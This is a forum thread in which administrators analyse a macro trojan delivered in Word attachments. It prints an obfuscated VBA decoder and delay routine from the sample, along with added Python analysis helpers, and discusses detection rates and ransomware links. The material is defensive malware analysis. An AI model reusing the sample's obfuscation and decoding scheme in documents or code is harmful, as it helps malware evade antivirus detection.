
New VBA trojan?


20 replies to this topic

#1 JohnnyJammer


Posted 16 December 2015 - 05:22 PM

I have got a few of these emails to an end user at work today.

They appear to be Word .doc files with VBA trojans.

I unzipped the Word document and some of the functions appear to be as follows (I'm assuming it was to use the buffer overflow in the ReDim array?)

 

```vb
' Excerpt begins mid-procedure; the header of the enclosing Sub is not in the sample.
' Lines such as "AywrVYyn6PU8e = 86" are dead assignments to never-read variables,
' inserted as noise. OJwHPvvkNBx and LHJwPn are calls to procedures not shown here.
AywrVYyn6PU8e = 86
OJwHPvvkNBx
Qa8n = 30
Else
KRVvrFzLxkP = 12
LHJwPn
VuxW4RviE = 2
End If
Else
AywuIoq8E = 24
LHJwPn
QY89oxaGRhUDwYw = 17
End If
C359eVaPxY = 58
Else
VuwAfv5FWQ = 28
LHJwPn
QUt = 88
End If
I993Iemo = 24
End Sub

' Decoding routine: a keyed XOR over the bytes of S55DXTA3D7Tg, keyed by TjaTJVDNlOls4K.
' Every numeric literal is hidden as an expression of the form (a + b + a - b), which is just 2a.
Function Np9d4Sq1ms(ByVal S55DXTA3D7Tg As String, TjaTJVDNlOls4K As String) As String
PYLdSL = 61
On Error Resume Next   ' swallows every runtime error in this routine
UUUsxv = 56
Dim YYcrmHOr6p8() As Byte, Llll3kaEPCtrC(0 To 285) As Integer, IH0ipwfjMLToiiMP() As Byte, X0IbZjw3ZrcqO1W, CGwtlD1j6g, MxT4Xhkm4DFNF1, Qb7Gf5L3T, RrqY8Ea2pxa As Boolean
Q4jBuBNj = 69
YYcrmHOr6p8 = StrConv(S55DXTA3D7Tg, (64 + 5 + 64 - 5))   ' 128 = vbFromUnicode: data text -> ANSI bytes
BFFXuVGJN40 = 54
IH0ipwfjMLToiiMP() = StrConv(TjaTJVDNlOls4K, (64 + 7 + 64 - 7))   ' 128 = vbFromUnicode: key text -> bytes
ALbkkp7e1St = 20
CGwtlD1j6g = UBound(IH0ipwfjMLToiiMP)   ' last index of the key bytes
ITjFVBmH40hkGvi = 5
' Build a 286-entry lookup table: entries 0..255 are the identity, 256..285 are index Xor 128
For X0IbZjw3ZrcqO1W = 0 To (127.5 + 1 + 127.5 - 1)   ' 0 To 255
Llll3kaEPCtrC(X0IbZjw3ZrcqO1W) = X0IbZjw3ZrcqO1W
Next X0IbZjw3ZrcqO1W
For X0IbZjw3ZrcqO1W = (128 + 1 + 128 - 1) To (142.5 + 1 + 142.5 - 1)   ' 256 To 285
Llll3kaEPCtrC(X0IbZjw3ZrcqO1W) = X0IbZjw3ZrcqO1W Xor (128 + 2 + 128 - 2)   ' Xor 128
Next X0IbZjw3ZrcqO1W
' Overwrite 12 table entries (0..5 and 250..255) with key-derived bytes
For X0IbZjw3ZrcqO1W = 1 To (3 + 9 + 3 - 9)   ' 1 To 6
Llll3kaEPCtrC(X0IbZjw3ZrcqO1W + (124.5 + 7 + 124.5 - 7)) = IH0ipwfjMLToiiMP(CGwtlD1j6g - X0IbZjw3ZrcqO1W)   ' index X + 249
Llll3kaEPCtrC(X0IbZjw3ZrcqO1W - 1) = IH0ipwfjMLToiiMP(X0IbZjw3ZrcqO1W - 1) Xor ((127.5 + 5 + 127.5 - 5) - IH0ipwfjMLToiiMP(CGwtlD1j6g - X0IbZjw3ZrcqO1W))   ' 255 - key byte
Next X0IbZjw3ZrcqO1W
RrqY8Ea2pxa = False
MxT4Xhkm4DFNF1 = 0   ' key index, wraps over the key length
Qb7Gf5L3T = 0        ' table index, restarts at 0 and 5 on alternate wraps
For X0IbZjw3ZrcqO1W = 0 To UBound(YYcrmHOr6p8)
If MxT4Xhkm4DFNF1 > CGwtlD1j6g Then MxT4Xhkm4DFNF1 = 0
If Qb7Gf5L3T > (142.5 + 8 + 142.5 - 8) And RrqY8Ea2pxa = False Then Qb7Gf5L3T = 0: RrqY8Ea2pxa = Not (RrqY8Ea2pxa)   ' > 285
If Qb7Gf5L3T > (142.5 + 8 + 142.5 - 8) And RrqY8Ea2pxa = True Then Qb7Gf5L3T = (2.5 + 1 + 2.5 - 1): RrqY8Ea2pxa = Not (RrqY8Ea2pxa)   ' > 285, restart at 5
' XOR each data byte with table(Qb7Gf5L3T) Xor key(MxT4Xhkm4DFNF1). Table entries 256..285 exceed 255,
' so at those positions the Byte assignment overflows and On Error Resume Next leaves the byte unchanged.
YYcrmHOr6p8(X0IbZjw3ZrcqO1W) = (YYcrmHOr6p8(X0IbZjw3ZrcqO1W) Xor (Llll3kaEPCtrC(Qb7Gf5L3T) Xor IH0ipwfjMLToiiMP(MxT4Xhkm4DFNF1)))
MxT4Xhkm4DFNF1 = MxT4Xhkm4DFNF1 + 1
Qb7Gf5L3T = Qb7Gf5L3T + 1
Next X0IbZjw3ZrcqO1W
R2OBryMQJGjs = 19
Np9d4Sq1ms = StrConv(YYcrmHOr6p8(), (32 + 6 + 32 - 6))   ' 64 = vbUnicode: decoded bytes -> text
PexIcSt3 = 76
End Function

' Busy-wait delay: spins for Phl seconds while pumping messages with DoEvents
Sub GBYGgwyBbLw8ZglD(Phl As Long)
ANQYYlB45stwz = 85
Dim L8cH8X1TdWk As Long
Y5K93pkg = 86
L8cH8X1TdWk = Timer + Phl   ' Timer = seconds since midnight
Do While Timer < L8cH8X1TdWk
DoEvents
Loop
Lgs54WPK30VtF4 = 94
End Sub
```

 

I could upload a sample if anyone is keen, because on VirusTotal only one AV picked it up as a VBA trojan; the rest appear to class it as clean.
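Two analysis helpers for the excerpt above, added here as example code (not from the original post): a constant folder for the `(a + b + a - b)` padding idiom, and a byte-level port of `Np9d4Sq1ms` that reproduces the routine's overflow-skipping behaviour. The key and plaintext in the usage are constructed; the real sample's strings are not on this page.

```python
# Added analysis helpers for the VBA excerpt above (example code, not from the original post).
import ast
import re

# The sample pads every literal as "(a + b + a - b)": a parenthesised run of numeric +/- terms.
# Folding them recovers e.g. 128 (vbFromUnicode), 64 (vbUnicode), 255 and the table bound 285.
_CONST_EXPR = re.compile(r"\((?:\s*[\d.]+\s*[+-])+\s*[\d.]+\s*\)")

def fold_constants(vba_line: str) -> str:
    """Replace each padded arithmetic expression on a line with its literal value."""
    def _eval(node):  # only Add/Sub on numeric literals is accepted; nothing is executed
        if isinstance(node, ast.Constant) and isinstance(node.value, (int, float)):
            return node.value
        if isinstance(node, ast.BinOp) and isinstance(node.op, (ast.Add, ast.Sub)):
            left, right = _eval(node.left), _eval(node.right)
            return left + right if isinstance(node.op, ast.Add) else left - right
        raise ValueError("unexpected token in constant expression")
    def _repl(match):
        value = _eval(ast.parse(match.group(0), mode="eval").body)
        return str(int(value)) if value == int(value) else str(value)
    return _CONST_EXPR.sub(_repl, vba_line)

def np9d4sq1ms(data: bytes, key: bytes) -> bytes:
    """Port of Np9d4Sq1ms with its constants folded: a keyed XOR stream.
    Byte i is XORed with table[q] ^ key[m]; m wraps over the key, q walks a 286-entry
    table, restarting at 0 on its first wrap and at 5 thereafter. Entries 256..285 are
    >= 384, so the VBA Byte assignment overflows and On Error Resume Next skips them."""
    if len(key) < 7:
        raise ValueError("key must be at least 7 bytes (table setup reads key[n-6..n-1])")
    n = len(key) - 1                                   # UBound of the key array
    table = list(range(256)) + [i ^ 128 for i in range(256, 286)]
    for i in range(1, 7):                              # 12 key-derived table entries
        table[i + 249] = key[n - i]
        table[i - 1] = key[i - 1] ^ (255 - key[n - i])
    out, m, q, wrapped = bytearray(data), 0, 0, False
    for i in range(len(out)):
        if m > n:
            m = 0
        if q > 285 and not wrapped:
            q, wrapped = 0, True
        elif q > 285 and wrapped:
            q, wrapped = 5, False
        v = out[i] ^ table[q] ^ key[m]
        if v <= 255:                                   # overflow positions stay unchanged
            out[i] = v
        m += 1
        q += 1
    return bytes(out)
```

Because the keystream depends only on the key and position, the routine is its own inverse: running it twice with the same key returns the input, which is how an analyst can confirm it is a decoder rather than a one-way transform.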





#2 JohnnyJammer


Posted 16 December 2015 - 05:46 PM

Just did another scan

https://malwr.com/analysis/MTVkMWY1MDQ2MTU0NGQ1YjhmYWVhNWEwYzNjMGNkZWI/

Another result

https://www.hybrid-analysis.com/sample/365a04140b3abe71c6cb4248d5bbbb57a172f37fe878eec49dc90745f5c37ae3?environmentId=2

 

Nasty little sucker hey!


Edited by JohnnyJammer, 16 December 2015 - 05:54 PM.


#3 Aura


Posted 16 December 2015 - 05:48 PM

Mind uploading the sample to Hybrid-Analysis and sharing the report URL here? I prefer it to malwr :P

https://www.hybrid-analysis.com/



#4 technonymous


Posted 16 December 2015 - 05:54 PM

Be careful with that. Probably ransomware. Look at the end: "Do While Timer", "DoEvents", "Loop".



#5 JohnnyJammer


Posted 16 December 2015 - 06:00 PM

> Mind uploading the sample to Hybrid-Analysis and sharing the report URL here? I prefer it to malwr :P
>
> https://www.hybrid-analysis.com/

Edited last post

 

Yeh techy, we use MessageLabs and normally it's pretty good, but this was targeted at one user only.

 

Yeh, well, if they are using On Error Resume Next and DoEvents in VBA, then I assume they couldn't be bothered with error handling LOL.



#6 TsVk!


Posted 16 December 2015 - 06:02 PM

We have a huge wave of them in the last month or so here mate, 10-20 new instances per week.

 

We've tightened the screws on our macro policies... not much else to do at this stage I guess.



#7 JohnnyJammer


Posted 16 December 2015 - 06:03 PM

Also it connects to a defaced site.

https://sitecheck.sucuri.net/results/minnesotafoodreview.com

(<meta name="Keywords" content="Hacked by United Islamic Cyber Force">)


> We have a huge wave of them in the last month or so here mate, 10-20 new instances per week.
>
> We've tightened the screws on our macro policies... not much else to do at this stage I guess.

Yeh, as you would know, they have been targeting businesses up the QLD coast; we copped it a few weeks back as well and I was getting around 30-40 reports a day!


Edited by JohnnyJammer, 16 December 2015 - 06:04 PM.


#8 TsVk!


Posted 16 December 2015 - 06:10 PM

Our mail scanner isn't deleting any of them either, so the desktop AVs (when they finally wise up to the sigs) can't delete them off the IMAP server, though they can see them... which is leaving me with orange flashing lights on a mob of machines every day that need individual attention to turn off.

 

Spent most of yesterday looking for a solution to this to no avail. My analyst and I have decided we're going to block all .doc and .xlsx.... or perhaps external mail as a whole. :lmao:



#9 JohnnyJammer


Posted 16 December 2015 - 06:17 PM

LOL, so you guys don't use external filters? MessageLabs is great so far and the price isn't too bad either mate.



#10 TsVk!


Posted 16 December 2015 - 06:27 PM

Wet tropics mate... making anything cloud based is a bad idea, especially when our downtime tolerance is 0.

 

Considering a rack mount type affair like the Barracuda.



#11 JohnnyJammer


Posted 16 December 2015 - 06:31 PM

Yeh, our downtime is zero as well, but that's just unrealistic no matter what provisions you have in place.

If you use Symantec Vault you can download the emails from there as well; if we have an outage, all our mail pools up in the cloud until a connection to the mail server can be made, and then it starts trickling back in.

Anyway, I have submitted that file to our AV client and also a few others.



#12 TsVk!


Posted 16 December 2015 - 06:56 PM

Being in an industrial situation we start bleeding money if we stop, so it shouldn't be too hard to get "them" to pony up the cash for something decent on site. We lost 12 minutes last year... none this year (so far, touch wood) :)

 

Keep up the good fight Johnny.



#13 JohnnyJammer


Posted 16 December 2015 - 09:09 PM

Looks similar to this post

http://www.welivesecurity.com/2015/12/16/nemucod-malware-spreads-ransomware-teslacrypt-around-world/



#14 TsVk!


Posted 16 December 2015 - 09:55 PM

Yeah and a lot of these recently too, in the same vein.

 

https://www.virustotal.com/en/file/96a1cc638a0beecce0fd3ada82901009993d0ef5f76dac4e6ccf30ce2d3bc8ea/analysis/1450320811/

 

A few days ago when I received the file it was FUD.



#15 JohnnyJammer


Posted 17 December 2015 - 04:34 PM

Well, I submitted it to Webroot, Symantec, ESET and Kaspersky and they all replied except Webroot LOL.

All accepted it was a new threat as well.





